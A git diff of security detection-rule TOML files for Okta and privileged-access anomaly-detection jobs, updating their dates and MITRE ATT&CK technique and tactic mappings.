+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml b/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml
index ec410cc91fd..96b1ea065fd 100644
--- a/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml
+++ b/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -76,19 +76,46 @@ event.dataset: "okta.system" and event.action: "system.idp.lifecycle.create" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.007" name = "Hybrid Identity" reference = "https://attack.mitre.org/techniques/T1556/007/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml index b85da21efcb..c9f05289582 100644 --- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml +++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/01" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,14 +86,36 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml index 95c5b7cbd46..8fe48c52427 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -89,14 +89,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml index cea8bce82f4..edb900374fd 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -90,14 +90,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml index c25efcf1291..9a2e727746b 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,14 +88,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml index 225018502ae..7b479bfd9c8 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -99,9 +100,20 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml index 1387bf22786..e2754c6f00b 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -89,14 +89,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml index f79d485a9c4..eddc6f5cc81 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -89,14 +89,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml index 938ae0eef73..9568430174e 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -88,14 +88,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml index f84ac248bfd..5d92fbdb973 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -103,9 +104,20 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml index 14c6f23bdb1..e1575db67f9 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -98,9 +99,35 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml index abd5652b01f..1a67cb5a82f 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -98,9 +99,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml index 51b64715dc1..6861aead8f9 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -103,9 +104,20 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml index 6a80f4a7bd4..e394e67f94b 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -87,6 +87,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -97,9 +98,25 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml index bf61284eae9..b3949f019b3 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -90,6 +90,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -100,9 +101,30 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml index d287e6828b1..78f44f6aa21 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -87,6 +87,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -97,9 +98,12 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml index 581372213fe..84704015718 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -99,9 +100,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml index ece76dfc05e..655cc425870 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -99,9 +100,30 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml index 3ddc61961fd..8651e7f6c41 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_device_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml index afb390d2236..539df8411c5 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -91,6 +91,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -101,21 +102,48 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml index f7407fd1638..c8216dd03c8 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -99,9 +100,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml index c3078e43d19..697850d9351 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
